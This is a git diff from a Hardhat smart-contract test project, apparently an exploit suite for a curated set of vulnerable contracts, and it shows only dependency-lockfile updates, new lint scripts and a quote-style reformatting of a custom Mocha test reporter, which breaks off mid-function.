}, + "node_modules/normalize-url": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/normalize-url/-/normalize-url-8.0.1.tgz", + "integrity": "sha512-IO9QvjUMWxPQQhs60oOu10CRkWCiZzSUkzbXGGV9pviYl1fXYcvkzQ5jV9z8Y6un8ARoVRl4EtC6v6jNqbaJ/w==", + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/number-to-bn": { "version": "1.7.0", "resolved": "https://registry.npmjs.org/number-to-bn/-/number-to-bn-1.7.0.tgz", @@ -4958,6 +6072,14 @@ "node": ">=0.10.0" } }, + "node_modules/p-cancelable": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/p-cancelable/-/p-cancelable-3.0.0.tgz", + "integrity": "sha512-mlVgR3PGuzlo0MmTdk4cXqXWlwQDLnONTAg6sm62XkMJEiRxN3GL3SffkYvqwonbkJBcrI7Uvv5Zh9yjvn2iUw==", + "engines": { + "node": ">=12.20" + } + }, "node_modules/p-limit": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-1.3.0.tgz", @@ -5002,12 +6124,68 @@ "node": ">=4" } }, + "node_modules/package-json": { + "version": "8.1.1", + "resolved": "https://registry.npmjs.org/package-json/-/package-json-8.1.1.tgz", + "integrity": "sha512-cbH9IAIJHNj9uXi196JVsRlt7cHKak6u/e6AkL/bkRelZ7rlL3X1YKxsZwa36xipOEKAsdtmaG6aAJoM1fx2zA==", + "dependencies": { + "got": "^12.1.0", + "registry-auth-token": "^5.0.1", + "registry-url": "^6.0.0", + "semver": "^7.3.7" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/package-json/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/parent-module": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/parent-module/-/parent-module-1.0.1.tgz", + "integrity": "sha512-GQ2EWRpQV8/o+Aw8YqtfZZPfNRWZYkbidE9k5rpl/hC3vtHHBfGm2Ifi6qWV+coDGkrUKZAxE3Lot5kcsRlh+g==", + "dependencies": { + "callsites": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, "node_modules/parse-cache-control": { "version": "1.0.1", "resolved": "https://registry.npmjs.org/parse-cache-control/-/parse-cache-control-1.0.1.tgz", "integrity": "sha512-60zvsJReQPX5/QP0Kzfd/VrpjScIQ7SHBW6bFCYfEP+fp0Eppr1SHhIO5nd1PjZtvclzSzES9D/p5nFJurwfWg==", "peer": true }, + "node_modules/parse-json": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", + "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", + "dependencies": { + "@babel/code-frame": "^7.0.0", + "error-ex": "^1.3.1", + "json-parse-even-better-errors": "^2.3.0", + "lines-and-columns": "^1.1.6" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/path-exists": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-3.0.0.tgz", @@ -5024,6 +6202,15 @@ "node": ">=0.10.0" } }, + "node_modules/path-key": { + "version": "3.1.1", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", + "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", + "dev": true, + "engines": { + "node": ">=8" + } + }, "node_modules/path-parse": { "version": "1.0.7", "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", @@ -5033,7 +6220,6 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "peer": true, "engines": { "node": ">=8" } @@ -5062,6 +6248,11 @@ "node": ">=0.12" } }, + "node_modules/picocolors": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==" + }, "node_modules/picomatch": { "version": "2.3.1", "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", @@ -5082,6 +6273,14 @@ "node": ">=6" } }, + "node_modules/pluralize": { + "version": "8.0.0", + "resolved": "https://registry.npmjs.org/pluralize/-/pluralize-8.0.0.tgz", + "integrity": "sha512-Nc3IT5yHzflTfbjgqWcCPpo7DaKy4FnpB0l/zCAW0Tc7jxAiuqSxHasntB3D7887LSrA93kDJ9IXovxJYxyLCA==", + "engines": { + "node": ">=4" + } + }, "node_modules/prelude-ls": { "version": "1.1.2", "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.1.2.tgz", @@ -5092,20 +6291,50 @@ } }, "node_modules/prettier": { - "version": "2.8.8", - "resolved": "https://registry.npmjs.org/prettier/-/prettier-2.8.8.tgz", - "integrity": "sha512-tdN8qQGvNjw4CHbY+XXk0JgCXn9QiF21a55rBe5LJAU+kDyC4WQn4+awm2Xfk2lQMk5fKup9XgzTZtGkjBdP9Q==", - "peer": true, + "version": "3.3.3", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-3.3.3.tgz", + "integrity": "sha512-i2tDNA0O5IrMO757lfrdQZCc2jPNDVntV0m/+4whiDfWaTKfMNgR7Qz0NAeGz/nRqF4m5/6CLzbP4/liHt12Ew==", "bin": { - "prettier": "bin-prettier.js" + "prettier": "bin/prettier.cjs" }, "engines": { - "node": ">=10.13.0" + "node": ">=14" }, "funding": { "url": "https://github.com/prettier/prettier?sponsor=1" } }, + "node_modules/prettier-plugin-solidity": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/prettier-plugin-solidity/-/prettier-plugin-solidity-1.4.1.tgz", + "integrity": "sha512-Mq8EtfacVZ/0+uDKTtHZGW3Aa7vEbX/BNx63hmVg6YTiTXSiuKP0amj0G6pGwjmLaOfymWh3QgXEZkjQbU8QRg==", + "dependencies": { + "@solidity-parser/parser": "^0.18.0", + "semver": "^7.5.4" + }, + "engines": { + "node": ">=16" + }, + "peerDependencies": { + "prettier": ">=2.3.0" + } + }, + "node_modules/prettier-plugin-solidity/node_modules/@solidity-parser/parser": { + "version": "0.18.0", + "resolved": "https://registry.npmjs.org/@solidity-parser/parser/-/parser-0.18.0.tgz", + "integrity": "sha512-yfORGUIPgLck41qyN7nbwJRAx17/jAIXCTanHOJZhB6PJ1iAk/84b/xlsVKFSyNyLXIj0dhppoE0+CRws7wlzA==" + }, + "node_modules/prettier-plugin-solidity/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, "node_modules/process-nextick-args": { "version": "2.0.1", "resolved": "https://registry.npmjs.org/process-nextick-args/-/process-nextick-args-2.0.1.tgz", @@ -5134,6 +6363,11 @@ "node": ">= 6" } }, + "node_modules/proto-list": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/proto-list/-/proto-list-1.2.4.tgz", + "integrity": "sha512-vtK/94akxsTMhe0/cbfpR+syPuszcuwhqVjJq26CuNDgFGj682oRBXOP5MJpv2r7JtE8MsiepGIqvvOTBwn2vA==" + }, "node_modules/proxy-from-env": { "version": "1.1.0", "resolved": "https://registry.npmjs.org/proxy-from-env/-/proxy-from-env-1.1.0.tgz", @@ -5144,7 +6378,6 @@ "version": "2.3.1", "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.1.tgz", "integrity": "sha512-vYt7UD1U9Wg6138shLtLOvdAu+8DsC/ilFtEVHcH+wydcSpNE20AfSOduf6MkRFahL5FY7X1oU7nKVZFtfq8Fg==", - "peer": true, "engines": { "node": ">=6" } @@ -5184,6 +6417,17 @@ ], "peer": true }, + "node_modules/quick-lru": { + "version": "5.1.1", + "resolved": "https://registry.npmjs.org/quick-lru/-/quick-lru-5.1.1.tgz", + "integrity": "sha512-WuyALRjWPDGtt/wzJiadO5AXY+8hZ80hVpe6MyivgraREW751X3SbhRvG3eLKOYN+8VEvqLcf3wdnt44Z4S4SA==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/randombytes": { "version": "2.1.0", "resolved": "https://registry.npmjs.org/randombytes/-/randombytes-2.1.0.tgz", @@ -5206,6 +6450,28 @@ "node": ">= 0.8" } }, + "node_modules/rc": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/rc/-/rc-1.2.8.tgz", + "integrity": "sha512-y3bGgqKj3QBdxLbLkomlohkvsA8gdAiUQlSBJnBhfn+BPxg4bc62d8TcBW15wavDfgexCgccckhcZvywyQYPOw==", + "dependencies": { + "deep-extend": "^0.6.0", + "ini": "~1.3.0", + "minimist": "^1.2.0", + "strip-json-comments": "~2.0.1" + }, + "bin": { + "rc": "cli.js" + } + }, + "node_modules/rc/node_modules/strip-json-comments": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-2.0.1.tgz", + "integrity": "sha512-4gB8na07fecVVkOI6Rs4e7T6NOTki5EmL7TUduTs6bu3EdnSycntVJ4re8kgZA+wx9IueI2Y11bfbgwtzuE0KQ==", + "engines": { + "node": ">=0.10.0" + } + }, "node_modules/readable-stream": { "version": "3.6.2", "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-3.6.2.tgz", @@ -5263,6 +6529,31 @@ "node": ">=6" } }, + "node_modules/registry-auth-token": { + "version": "5.0.2", + "resolved": "https://registry.npmjs.org/registry-auth-token/-/registry-auth-token-5.0.2.tgz", + "integrity": "sha512-o/3ikDxtXaA59BmZuZrJZDJv8NMDGSj+6j6XaeBmHw8eY1i1qd9+6H+LjVvQXx3HN6aRCGa1cUdJ9RaJZUugnQ==", + "dependencies": { + "@pnpm/npm-conf": "^2.1.0" + }, + "engines": { + "node": ">=14" + } + }, + "node_modules/registry-url": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/registry-url/-/registry-url-6.0.1.tgz", + "integrity": "sha512-+crtS5QjFRqFCoQmvGduwYWEBng99ZvmFvF+cUJkGYF1L1BfU8C6Zp9T7f5vPAwyLkUExpvK+ANVZmGU49qi4Q==", + "dependencies": { + "rc": "1.2.8" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/req-cwd": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/req-cwd/-/req-cwd-2.0.0.tgz", @@ -5314,6 +6605,11 @@ "url": "https://github.com/sponsors/ljharb" } }, + "node_modules/resolve-alpn": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/resolve-alpn/-/resolve-alpn-1.2.1.tgz", + "integrity": "sha512-0a1F4l73/ZFZOakJnQ3FvkJ2+gSTQWz/r2KE5OdDY0TxPm5h4GkqkWWfM47T7HsbnOtcJVEF4epCVy6u7Q3K+g==" + }, "node_modules/resolve-from": { "version": "3.0.0", "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-3.0.0.tgz", @@ -5323,6 +6619,20 @@ "node": ">=4" } }, + "node_modules/responselike": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/responselike/-/responselike-3.0.0.tgz", + "integrity": "sha512-40yHxbNcl2+rzXvZuVkrYohathsSJlMTXKryG5y8uciHv1+xDLHQpgjG64JUO9nrEq2jGLH6IZ8BcZyw3wrweg==", + "dependencies": { + "lowercase-keys": "^3.0.0" + }, + "engines": { + "node": ">=14.16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/reusify": { "version": "1.0.4", "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", @@ -5603,6 +6913,27 @@ "node": "*" } }, + "node_modules/shebang-command": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", + "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", + "dev": true, + "dependencies": { + "shebang-regex": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/shebang-regex": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", + "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==", + "dev": true, + "engines": { + "node": ">=8" + } + }, "node_modules/shelljs": { "version": "0.8.5", "resolved": "https://registry.npmjs.org/shelljs/-/shelljs-0.8.5.tgz", @@ -5657,7 +6988,6 @@ "version": "4.0.0", "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-4.0.0.tgz", "integrity": "sha512-qMCMfhY040cVHT43K9BFygqYbUPFZKHOg7K73mtTWJRb8pyP3fzf4Ixd5SzdEJQ6MRUg/WBnOLxghZtKKurENQ==", - "peer": true, "dependencies": { "ansi-styles": "^4.0.0", "astral-regex": "^2.0.0", @@ -5674,7 +7004,6 @@ "version": "4.3.0", "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "peer": true, "dependencies": { "color-convert": "^2.0.1" }, @@ -5689,7 +7018,6 @@ "version": "2.0.1", "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "peer": true, "dependencies": { "color-name": "~1.1.4" }, @@ -5700,8 +7028,7 @@ "node_modules/slice-ansi/node_modules/color-name": { "version": "1.1.4", "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==", - "peer": true + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" }, "node_modules/solc": { "version": "0.7.3", @@ -5753,6 +7080,198 @@ "semver": "bin/semver" } }, + "node_modules/solhint": { + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/solhint/-/solhint-5.0.3.tgz", + "integrity": "sha512-OLCH6qm/mZTCpplTXzXTJGId1zrtNuDYP5c2e6snIv/hdRVxPfBBz/bAlL91bY/Accavkayp2Zp2BaDSrLVXTQ==", + "dependencies": { + "@solidity-parser/parser": "^0.18.0", + "ajv": "^6.12.6", + "antlr4": "^4.13.1-patch-1", + "ast-parents": "^0.0.1", + "chalk": "^4.1.2", + "commander": "^10.0.0", + "cosmiconfig": "^8.0.0", + "fast-diff": "^1.2.0", + "glob": "^8.0.3", + "ignore": "^5.2.4", + "js-yaml": "^4.1.0", + "latest-version": "^7.0.0", + "lodash": "^4.17.21", + "pluralize": "^8.0.0", + "semver": "^7.5.2", + "strip-ansi": "^6.0.1", + "table": "^6.8.1", + "text-table": "^0.2.0" + }, + "bin": { + "solhint": "solhint.js" + }, + "optionalDependencies": { + "prettier": "^2.8.3" + } + }, + "node_modules/solhint/node_modules/@solidity-parser/parser": { + "version": "0.18.0", + "resolved": "https://registry.npmjs.org/@solidity-parser/parser/-/parser-0.18.0.tgz", + "integrity": "sha512-yfORGUIPgLck41qyN7nbwJRAx17/jAIXCTanHOJZhB6PJ1iAk/84b/xlsVKFSyNyLXIj0dhppoE0+CRws7wlzA==" + }, + "node_modules/solhint/node_modules/ajv": { + "version": "6.12.6", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", + "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", + "dependencies": { + "fast-deep-equal": "^3.1.1", + "fast-json-stable-stringify": "^2.0.0", + "json-schema-traverse": "^0.4.1", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/solhint/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/solhint/node_modules/brace-expansion": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-2.0.1.tgz", + "integrity": "sha512-XnAIvQ8eM+kC6aULx6wuQiwVsnzsi9d3WxzV3FpWTGA19F621kwdbsAcFKXgKUHZWsy+mY6iL1sHTxWEFCytDA==", + "dependencies": { + "balanced-match": "^1.0.0" + } + }, + "node_modules/solhint/node_modules/chalk": { + "version": "4.1.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", + "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", + "dependencies": { + "ansi-styles": "^4.1.0", + "supports-color": "^7.1.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/chalk?sponsor=1" + } + }, + "node_modules/solhint/node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/solhint/node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "node_modules/solhint/node_modules/commander": { + "version": "10.0.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-10.0.1.tgz", + "integrity": "sha512-y4Mg2tXshplEbSGzx7amzPwKKOCGuoSRP/CjEdwwk0FOGlUbq6lKuoyDZTNZkmxHdJtp54hdfY/JUrdL7Xfdug==", + "engines": { + "node": ">=14" + } + }, + "node_modules/solhint/node_modules/glob": { + "version": "8.1.0", + "resolved": "https://registry.npmjs.org/glob/-/glob-8.1.0.tgz", + "integrity": "sha512-r8hpEjiQEYlF2QU0df3dS+nxxSIreXQS1qRhMJM0Q5NDdR386C7jb7Hwwod8Fgiuex+k0GFjgft18yvxm5XoCQ==", + "deprecated": "Glob versions prior to v9 are no longer supported", + "dependencies": { + "fs.realpath": "^1.0.0", + "inflight": "^1.0.4", + "inherits": "2", + "minimatch": "^5.0.1", + "once": "^1.3.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/isaacs" + } + }, + "node_modules/solhint/node_modules/has-flag": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-4.0.0.tgz", + "integrity": "sha512-EykJT/Q1KjTWctppgIAgfSO0tKVuZUjhgMr17kqTumMl6Afv3EISleU7qZUzoXDFTAHTDC4NOoG/ZxU3EvlMPQ==", + "engines": { + "node": ">=8" + } + }, + "node_modules/solhint/node_modules/json-schema-traverse": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-0.4.1.tgz", + "integrity": "sha512-xbbCH5dCYU5T8LcEhhuh7HJ88HXuW3qsI3Y0zOZFKfZEHcpWiHU/Jxzk629Brsab/mMiHQti9wMP+845RPe3Vg==" + }, + "node_modules/solhint/node_modules/minimatch": { + "version": "5.1.6", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-5.1.6.tgz", + "integrity": "sha512-lKwV/1brpG6mBUFHtb7NUmtABCb2WZZmm2wNiOA5hAb8VdCS4B3dtMWyvcoViccwAW/COERjXLt0zP1zXUN26g==", + "dependencies": { + "brace-expansion": "^2.0.1" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/solhint/node_modules/prettier": { + "version": "2.8.8", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-2.8.8.tgz", + "integrity": "sha512-tdN8qQGvNjw4CHbY+XXk0JgCXn9QiF21a55rBe5LJAU+kDyC4WQn4+awm2Xfk2lQMk5fKup9XgzTZtGkjBdP9Q==", + "optional": true, + "bin": { + "prettier": "bin-prettier.js" + }, + "engines": { + "node": ">=10.13.0" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, + "node_modules/solhint/node_modules/semver": { + "version": "7.6.3", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.6.3.tgz", + "integrity": "sha512-oVekP1cKtI+CTDvHWYFUcMtsK/00wmAEfyqKfNdARm8u1wNVhSgaX7A8d4UuIlUI5e84iEwOhs7ZPYRmzU9U6A==", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/solhint/node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, "node_modules/solidity-coverage": { "version": "0.8.12", "resolved": "https://registry.npmjs.org/solidity-coverage/-/solidity-coverage-0.8.12.tgz", @@ -5976,7 +7495,6 @@ "version": "6.8.2", "resolved": "https://registry.npmjs.org/table/-/table-6.8.2.tgz", "integrity": "sha512-w2sfv80nrAh2VCbqR5AK27wswXhqcck2AhfnNW76beQXskGZ1V12GwS//yYVa3d3fcvAip2OUnbDAjW2k3v9fA==", - "peer": true, "dependencies": { "ajv": "^8.0.1", "lodash.truncate": "^4.4.2", @@ -6021,6 +7539,11 @@ "node": ">=8" } }, + "node_modules/text-table": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", + "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==" + }, "node_modules/then-request": { "version": "6.0.2", "resolved": "https://registry.npmjs.org/then-request/-/then-request-6.0.2.tgz", @@ -6357,6 +7880,21 @@ "node": ">=10" } }, + "node_modules/typechain/node_modules/prettier": { + "version": "2.8.8", + "resolved": "https://registry.npmjs.org/prettier/-/prettier-2.8.8.tgz", + "integrity": "sha512-tdN8qQGvNjw4CHbY+XXk0JgCXn9QiF21a55rBe5LJAU+kDyC4WQn4+awm2Xfk2lQMk5fKup9XgzTZtGkjBdP9Q==", + "peer": true, + "bin": { + "prettier": "bin-prettier.js" + }, + "engines": { + "node": ">=10.13.0" + }, + "funding": { + "url": "https://github.com/prettier/prettier?sponsor=1" + } + }, "node_modules/typedarray": { "version": "0.0.6", "resolved": "https://registry.npmjs.org/typedarray/-/typedarray-0.0.6.tgz", @@ -6434,7 +7972,6 @@ "version": "4.4.1", "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "peer": true, "dependencies": { "punycode": "^2.1.0" } @@ -6573,7 +8110,6 @@ "version": "1.2.5", "resolved": "https://registry.npmjs.org/word-wrap/-/word-wrap-1.2.5.tgz", "integrity": "sha512-BN22B5eaMMI9UMtjrGd5g5eCYPpCPDUy0FJXbYsaT5zYxjFOckS53SQDE3pWkVoWpHXVb3BrYcEN4Twa55B5cA==", - "peer": true, "engines": { "node": ">=0.10.0" } diff --git a/smartbugs-curated/0.4.x/package.json b/smartbugs-curated/0.4.x/package.json index 5a8f8ff..884efb5 100644 --- a/smartbugs-curated/0.4.x/package.json +++ b/smartbugs-curated/0.4.x/package.json @@ -1,17 +1,29 @@ { - "name": "testing-hardhat", + "name": "smartbugs-curated-exploits", "version": "1.0.0", "description": "", "main": "index.js", "scripts": { - "test": "echo \"Error: no test specified\" && exit 1" + "test": "hardhat test", + "compile": "hardhat compile", + "clean": "hardhat clean", + "lint": "npm run lint:js && npm run lint:sol", + "lint:fix": "npm run lint:js:fix && npm run lint:sol:fix", + "lint:js": "prettier --log-level warn '**/*.{js,ts}' --check && eslint .", + "lint:js:fix": "prettier --log-level warn '**/*.{js,ts}' --write && eslint . --fix", + "lint:sol": "prettier --log-level warn --plugin=prettier-plugin-solidity contracts/**/*.sol --check && solhint contracts/**/*.sol", + "lint:sol:fix": "prettier --log-level warn --plugin=prettier-plugin-solidity contracts/**/*.sol --write" }, - "author": "", - "license": "ISC", + "license": "MIT", "devDependencies": { + "eslint": "^9.13.0", + "globals": "^15.11.0", "hardhat": "^2.22.5" }, "dependencies": { - "@nomicfoundation/hardhat-toolbox": "^5.0.0" + "@nomicfoundation/hardhat-toolbox": "^5.0.0", + "prettier": "^3.3.3", + "prettier-plugin-solidity": "^1.4.1", + "solhint": "^5.0.3" } } diff --git a/smartbugs-curated/0.4.x/scripts/CustomReporter.js b/smartbugs-curated/0.4.x/scripts/CustomReporter.js index 7792c98..32c1b60 100644 --- a/smartbugs-curated/0.4.x/scripts/CustomReporter.js +++ b/smartbugs-curated/0.4.x/scripts/CustomReporter.js @@ -1,13 +1,13 @@ -const Mocha = require('mocha'); -const fs = require('fs'); -const path = require('path'); -const { fail } = require('assert'); +const Mocha = require("mocha"); +const fs = require("fs"); +const path = require("path"); +const { fail } = require("assert"); // Extend the Spec reporter const Spec = Mocha.reporters.Spec; const Base = Mocha.reporters.Base; // For styling and symbols -const suffix = ''; +const suffix = ""; class CustomReporter extends Spec { constructor(runner, options) { // Call the parent constructor (Spec reporter) @@ -23,12 +23,12 @@ class CustomReporter extends Spec { let passedSanity = 0; const passedResults = []; const failedResults = []; - + const exportOptions = options.reporterOptions || {}; const exportToJson = exportOptions.json || false; // When a new suite (test file) starts - runner.on('suite', (suite) => { + runner.on("suite", (suite) => { if (suite.file) { if (currentFile !== suite.file) { // New test file started @@ -40,88 +40,95 @@ class CustomReporter extends Spec { }); // If any test fails - runner.on('fail', (test, err) => { + runner.on("fail", (test, err) => { // Mark the current test file as having failed tests allTestsPassed = false; - const fileName = currentFile.split('/test/')[1]; - const contractFile = fileName.replace('_test.js', suffix+ '.sol'); - const result ={ - title: test.title, - file: fileName, - contractFile: contractFile, - state: test.state, - error: err.message, - stack: err.stack, - } - if (test.title.includes('sanity check')) { + const fileName = currentFile.split("/test/")[1]; + const contractFile = fileName.replace("_test.js", suffix + ".sol"); + const result = { + title: test.title, + file: fileName, + contractFile: contractFile, + state: test.state, + error: err.message, + stack: err.stack, + }; + if (test.title.includes("sanity check")) { failedSanity += 1; failedSanityTests.push(result); - } - else { + } else { failedResults.push(result); } }); // If any test passes - runner.on('pass', (test) => { - const fileName = currentFile.split('/test/')[1]; - const contractFile = fileName.replace('_test.js', suffix + '.sol'); + runner.on("pass", (test) => { + const fileName = currentFile.split("/test/")[1]; + const contractFile = fileName.replace("_test.js", suffix + ".sol"); const result = { title: test.title, file: fileName, contractFile: contractFile, state: test.state, }; - if (test.title.includes('sanity check')) { + if (test.title.includes("sanity check")) { passedSanity += 1; - } - else { + } else { passedResults.push(result); } }); // When the suite (test file) ends - runner.on('suite end', (suite) => { + runner.on("suite end", (suite) => { if (suite.file && currentFile === suite.file && allTestsPassed) { passingFiles += 1; } }); // At the end of all tests, log the number of passing test files in the same style as passing tests - runner.on('end', () => { - const { tests, passes, failures, pending, duration } = runner.stats; + runner.on("end", () => { + const { tests, passes, failures, pending, duration } = runner.stats; - const failedFiles = 